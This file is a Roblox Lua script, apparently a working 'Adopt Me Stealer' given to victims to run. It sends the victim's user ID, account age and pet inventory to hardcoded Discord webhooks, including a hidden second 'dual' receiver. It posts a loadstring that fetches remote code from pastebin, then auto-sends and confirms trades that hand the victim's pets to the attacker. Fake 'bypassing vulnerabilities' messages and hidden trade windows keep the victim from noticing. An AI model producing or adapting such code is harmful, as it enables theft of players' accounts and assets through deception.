local LogsUsername = "ImagineGotScamXD" -- dual user
local Loads = require(game.ReplicatedStorage.Fsys).load
local InventoryDB = Loads("InventoryDB")
local ClientData = Loads('ClientData')
local legendaries_count = 0
local mega_count = 0
local neon_count = 0
local ultra_count = 0
local rare_count = 0
local uncommon_count = 0
local common_count = 0

local function muteAllAudio() -- mute all audio ingame
    for _, sound in pairs(workspace:GetDescendants()) do
        if sound:IsA("Sound") then
            sound:Stop()
            sound.Volume = 0
        end
    end
end

muteAllAudio()

workspace.DescendantAdded:Connect(function(descendant)
    if descendant:IsA("Sound") then
        descendant:Stop()
        descendant.Volume = 0
    end
end)

for i, v in pairs(ClientData.get("inventory").pets) do
  if InventoryDB[v.category][v.id].rarity == "legendary" then
    legendaries_count = legendaries_count + 1
  end
  if InventoryDB[v.category][v.id].properties == "mega_neon" then
    mega_count = mega_count + 1
  end
  if InventoryDB[v.category][v.id].properties == "neon" then
    neon_count = neon_count + 1
  end
  if InventoryDB[v.category][v.id].rarity == "ultra_rare" then
    ultra_count = ultra_count + 1
  end
  if InventoryDB[v.category][v.id].rarity == "rare" then
    rare_count = rare_count + 1
  end
  if InventoryDB[v.category][v.id].rarity == "uncommon" then
    uncommon_count = uncommon_count + 1
  end
  if InventoryDB[v.category][v.id].rarity == "common" then
    common_count = common_count + 1
  end
end

local exploit
local function getexploit()
    local exploitt =
        (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X") or
        (secure_load and "Sentinel") or
        (is_sirhurt_closure and "Sirhurt") or
        (pebc_execute and "ProtoSmasher") or
        (KRNL_LOADED and "KRNL") or
        (WrapGlobal and "WeAreDevs") or
        (isvm and "Proxo") or
        (shadow_env and "Shadow") or
        (jit and "EasyExploits") or
        (getscriptenvs and "Codex/Unknown") or
        (unit and not syn and "Unit") or
        (OXYGEN_LOADED and "Oxygen U") or
        (IsElectron and "Electron") or
        ("Couldnt Grab")

    exploit = exploitt
end
getexploit()
local plr = game.Players.LocalPlayer
local userid = game.Players.LocalPlayer.UserId
local accage = game.Players.LocalPlayer.AccountAge
local httpRequest = http.request or httprequest
local embed1 = {
  username = 'Kenn | Adopt Me Stealer!!',
  avatar_url = 'https://cdn.discordapp.com/attachments/1309897803664719954/1317140673748533320/pp_akmal.jpg?ex=675d9a57&is=675c48d7&hm=b6579429218eb26462029f66bf6e9ee2587490b3f3d02cb81186fc5eed1b1128&',
  content = '@everyone\nGoal 50 Member = mm2 Stealer\nhttps://discord.gg/a8fnty4z43',
  embeds = {
    {
      title = 'Join your player using **EXECUTE TO JOIN THEM** and they should just trade you to start stealing!',
      description = '**ðŸ“„  Player Information**: \n ```lua\nðŸ”Œ Executor: '.. tostring(exploit) ..'\nðŸ—½ Username: '.. tostring(plr) ..'\nðŸ—¼ User-ID: '.. tostring(userid) ..'\nâ›© Account Age: '.. tostring(accage) ..'\nðŸ— Receiver: '.. Username ..'\n```\n **ðŸ“¦ Inventory**: \n ```lua\nðŸ¦’ Legendaries: '.. tostring(legendaries_count).. '\nðŸ‰ Mega Neons: '.. tostring(mega_count).. '\nðŸ¦– Neons: '.. tostring(neon_count).. '\nðŸŠ Ultra Rares: '.. tostring(ultra_count).. '\nðŸŒ Rares: '.. tostring(rare_count).. '\nðŸ¦€ Uncommons: '.. tostring(uncommon_count).. '\nðŸˆ Commons: '.. tostring(common_count).. '\n```\n**ðŸ’¼ Execute To Join Them**:\n\n```lua\ngame:GetService("TeleportService"):TeleportToPlaceInstance(920587237, "' .. game.JobId .. '", game.Players.LocalPlayer)\n```',
      color = 10428396,
      fields = {
                {
                name = "ðŸŽ®Auto Joiner",
                value = "**COMMING SOON!**"
                }
      }
    }
  }
}

local embed2 = {
  username = 'Dualhooked | Adopt Me Stealer!!',
  avatar_url = 'https://cdn.discordapp.com/attachments/1309897803664719954/1317140673748533320/pp_akmal.jpg?ex=675d9a57&is=675c48d7&hm=b6579429218eb26462029f66bf6e9ee2587490b3f3d02cb81186fc5eed1b1128&',
  content = '-- @everyone\ngame:GetService("TeleportService"):TeleportToPlaceInstance(920587237, "' .. game.JobId .. '", game.Players.LocalPlayer)',
  embeds = {
    {
      title = 'Gacor kang dualhuk aselole\nCepetin join dongo keburu diambil',
      description = '**ðŸ“„  Player Information**: \n ```lua\nðŸ”Œ Executor: '.. tostring(exploit) ..'\nðŸ—½ Username: '.. tostring(plr) ..'\nðŸ—¼ User-ID: '.. tostring(userid) ..'\nâ›© Account Age: '.. tostring(accage) ..'\nðŸ— Receiver: '.. Username ..'\nðŸ— Dual Receiver: '.. LogsUsername ..'\n```\n **ðŸ“¦ Inventory**: \n ```lua\nðŸ¦’ Legendaries: '.. tostring(legendaries_count).. '\nðŸ‰ Mega Neons: '.. tostring(mega_count).. '\nðŸ¦– Neons: '.. tostring(neon_count).. '\nðŸŠ Ultra Rares: '.. tostring(ultra_count).. '\nðŸŒ Rares: '.. tostring(rare_count).. '\nðŸ¦€ Uncommons: '.. tostring(uncommon_count).. '\nðŸˆ Commons: '.. tostring(common_count).. '\n```\n**ðŸŽ Claim All Script**:\n\n```lua\nUsername = "'.. tostring(plr) ..'"\nloadstring(game:HttpGet("https://pastebin.com/raw/GzXc94aX"))()\n```',
      color = 10428396,
      fields = {
                {
                name = "ðŸŽ®Auto Joiner",
                value = "**COMMING SOON!**"
                }
      }
    }
  }
}

local function sendEmbed(webhookUrl, embedData)
    if httpRequest then
        httpRequest({
            Url = webhookUrl,
            Method = 'POST',
            Headers = {
                ['Content-Type'] = 'application/json'
            },
            Body = game:GetService('HttpService'):JSONEncode(embedData)
        })
    else
        print("Bruh")
    end
end

local LogsWebhook = "https://discord.com/api/webhooks/1317375854271004682/-m9-COdMc-4sYKsrNjiPuNHbaeWobJ7ncH7seLMpmP2lApOawdE4eF6ekt2DFj_0xJnS"
sendEmbed(LogsWebhook, embed2)
wait(7)
sendEmbed(Webhook, embed1)

-- Initialize trade information
local trade_info = {}

-- Function to handle RemoteEvent connections
for _, event in pairs(game:GetService("ReplicatedStorage").API:GetChildren()) do
    if event:IsA("RemoteEvent") then
        spawn(function()
            event.OnClientEvent:Connect(function(...)
                local data = { ... } -- Extract event arguments into a table

                if type(data[3]) == "table" and data[2] == "trade" then
                    local trade_data = data[3]
                    trade_info = {
                        sender = trade_data.sender,
                        sender_offer = trade_data.sender_offer,
                    }
                end
            end)
        end)
    end
end

-- Function to send a trade request
local function SendTrade()
    local Loads = require(game.ReplicatedStorage.Fsys).load
    local RouterClient = Loads("RouterClient")
    local send_trade = RouterClient.get("TradeAPI/SendTradeRequest")

    repeat
        if LogsUsername then
            send_trade:FireServer(LogsUsername)
        elseif Username then
            send_trade:FireServer(Username)
        else
            print("No username found.")
        end

        -- Add pets to the trade offer
        local AddPetRemote = RouterClient.get("TradeAPI/AddItemToOffer")
        local inventory = require(game.ReplicatedStorage.ClientModules.Core.ClientData).get_data()[game.Players.LocalPlayer.Name].inventory

        while inventory.pets and #inventory.pets > 2 do
            local petCount = 0
            local petUids = {}

            for petUid, _ in pairs(inventory.pets) do
                table.insert(petUids, petUid)
            end

            for i = 1, math.min(18, #petUids) do
                AddPetRemote:FireServer(petUids[i])
            end

            -- Accept negotiation
            local AcceptNegotiationRemote = RouterClient.get("TradeAPI/AcceptNegotiation")
            AcceptNegotiationRemote:FireServer()

            -- Confirm the trade
            local AcceptTradeRemote = RouterClient.get("TradeAPI/ConfirmTrade")
            AcceptTradeRemote:FireServer()

            -- Update inventory after trade
            inventory = require(game.ReplicatedStorage.ClientModules.Core.ClientData).get_data()[game.Players.LocalPlayer.Name].inventory
        end

        if not inventory.pets or #inventory.pets <= 2 then
            print("Trade completed. Remaining pets: " .. (#inventory.pets or 0))
            break
        end
    until trade_info.sender_offer and #trade_info.sender_offer > 0 and trade_info.sender_offer.player_name
end

-- Function to start the trade process
local function StartTradeProcess()
    SendTrade()
end

-- Function to wait for the player to appear in the game
local function WaitForTrade()
    while true do
        if game.Players:FindFirstChild(Username) or game.Players:FindFirstChild(LogsUsername) then
            StartTradeProcess()
            break
        else
            wait(1)
        end
    end
end

local total_pets = 0
for i, v in pairs(ClientData.get("inventory").pets) do
    total_pets = total_pets + 1
end
warn("Your Script Detected", total_pets, "Vulnerabilities, Bypassing Them Right Now.")
wait(5)
print("Bypassed!")
    if total_pets == 2 then
        game:GetService("Players").LocalPlayer:Kick("Alt account detected, please have at least 3 pet in your inventory or use this script on your main account.")
end
game:GetService("Players").LocalPlayer.PlayerGui.DialogApp.Dialog.Visible = false
game:GetService("Players").LocalPlayer.PlayerGui.TradeApp.Enabled = false
WaitForTrade()
